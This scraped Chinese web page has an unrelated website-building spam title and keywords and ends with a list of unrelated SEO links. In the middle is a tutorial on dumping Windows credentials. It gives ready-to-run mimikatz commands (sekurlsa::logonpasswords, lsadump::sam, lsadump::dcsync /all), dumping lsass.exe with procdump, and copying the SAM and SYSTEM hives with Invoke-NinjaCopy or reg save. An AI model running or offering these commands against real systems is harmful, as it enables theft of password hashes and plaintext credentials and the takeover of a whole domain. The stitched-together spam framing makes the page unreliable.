当前位置: 首页 > news >正文

做网站和做网页一样吗免费给别人开发网站

做网站和做网页一样吗,免费给别人开发网站,sem竞价代运营,windows优化大师和鲁大师文章目录 一、获取域内单机密码和hash1.1 在线读取lsass进程内存1.2 离线读取lsass.exe进程内存1.3 在线读取本地SAM文件1.4 离线读取本地SAM文件 二、域hash获取三、windows凭据导出 一、获取域内单机密码和hash 在windows中#xff0c;SAM文件是windows用户的账户数据库SAM文件是windows用户的账户数据库位于系统的%SystemRoot%\System\Config目录中所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时用户输入的明文密码会被转化为hash然后再与SAM文件中的hash值对比若相同则认证成功。lsass.exe是windows的一个系统进程用于实现系统的安全机制主要用于本地安全和登录策略。在通常情况下用户输入密码登录后登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中用户的明文密码经过WDigest和Tspkg模块调用后会对其使用可逆的算法进行加密并存储在内存中。 用来获取主机的用户密码和hash的工作大多通过读取SAM文件或者访问lsass.exe进程的内存数据等操作来实现。这些操作大多需要管理员权限 1.1 在线读取lsass进程内存 mimikatz.exe privilege::debug sekurlsa::logonpasswords full exit # privilege::debug提升至Debugprivlege权限 # sekurlsa::logonpasswords full导出用户凭证如果出现以下错误需要用管理员身份打开cmd命令行。 1.2 离线读取lsass.exe进程内存 除了在线读取外还可以直接将lsass.exe的进程内存转存将内存文件导出到本地后使用mimikatz.exe进行离线读取。这里使用procdump实现离线转存。 procdump.exe -accepteula -ma lsass.exe lsass.dmp # 将lsass.exe进程转存 mimikatz.exe sekurl::minidump lsass.dmp sekurlsa::logonpasswords full exit # sekurl::minidump lsass.dump用于加载文件 # sekurlsa::logonpasswords full导出用户凭证1.3 在线读取本地SAM文件 读取SAM文件中保存的用户登录凭证可以导出当前系统中所有本地用户的hash。 mimikatz.exe privilege::debug token::elevate lsadump::sam exit # privilege::debug提升至Debugprivlege权限 # token::elevate提升到system权限 # lsadump::sam读取本地sam文件1.4 离线读取本地SAM文件 离线读取就是将SAM文件导出使用mimikatz加载并读取其中用户的登录凭证等信息。注意为了提高SAM文件的安全性以防止被离线破解windows会对SAM文件使用密钥进行加密这个密钥存储在SYSTEM文件中与SAM文件在同一目录下。 通过Invoke-NinjaCopy.psl脚本实现 在目标主机上导出SAM和SYSTEM文件因为系统在运行时这两个文件被锁定可以使用PowerSploit项目中的Invoke-NinjaCopy.psl脚本实现。 管理员身份启动powershell在域环境中需要域管理员密码才能启动。 Import-Module .\Invoke-NinjaCopy.psl Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Temp\SAM Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Temp\SYSTEM出现以下错误运行Set-ExecutionPolicy Unrestricted -Scope CurrrentUser。 # 使用mimikatz加载并读取SAM中的用户凭证信息 mimikatz.exe lsadump::sam /sam:C:\SAM /system:C:\SYSTEM exit通过注册表实现 需要管理员权限 # 使用管理员权限通过保存注册表的方式导出 reg save HKLM\SAM sam.hive reg save HKLM\SYSTEM system.hive# 使用mimikatz加载并读取SAM中的用户凭证 mimikatz.exe lsadump::sam /sam:sam.hive /system:system.hive exit二、域hash获取 lsadump::dcsync /domain:domain /all /csv # 导出域内所有用户的信息(包括哈希值)参考资料内网渗透测试DCSync 攻击技术的利用 三、windows凭据导出 Invoke-WCMDump一个用于Windows环境的凭据提取PowerShell模块能解密LSA和DPAPI存储的敏感信息以及捕获Wdigest明文密码。 待续…
http://www.hkea.cn/news/14324758/

相关文章:

  • 湘潭网站建设优化建站最新的新闻
  • 网站开发iis怎么配置群晖 做网站服务器
  • 设计网站哪个好用wordpress 文章目录导航
  • 股市行情app企业网站seo数据
  • 网站建设谈判网站改版升级通知
  • 一个网站两个域名吗互联网创始人
  • 织梦xml网站地图大数据做网站流量分析
  • 网站商城开发一个多少钱苏州做网站的单位
  • 怎么快速优化网站o2o网站建设策划
  • 百度收录网站方法江苏体育建设场地网站
  • 新手学网页设计的网站2020十大装修公司
  • 深圳网站优讳化环球贸易网
  • 部门网站建设宗旨建外文网站
  • 网站浮动窗口代码100m做电影网站
  • 网站关键字描述手机网站标准
  • 自建wap网站甘肃省路桥建设集团网站
  • 知名商城网站建设价格网站建设项目延期验收申请报告
  • 个人做网站能赚到钱吗业务管理系统
  • 网站建设准备资料衡水企业网站
  • 做网站需要什么电脑如何制作网页的软件
  • 网站怎么做关键词怎么优化标书制作一般给多少钱
  • 百度官方网站入口安徽索凯特建设工程有限公司网站
  • 什么网站需要服务器用什么编程语言做网站好
  • 最火的深圳网站建设巴中市文旅新区关坝片区安置房建设项目
  • 做指甲的网站营销案例最新
  • 中国建设行业信息网站网易考拉的网站建设
  • 做视频用的网站有哪些北京开公司一年费用
  • 河南英文网站建设公司哪里有建设网站
  • 长春网站建设吉网传媒实力牜注册网站需要什么程序
  • 西安网站建设德阳seo优化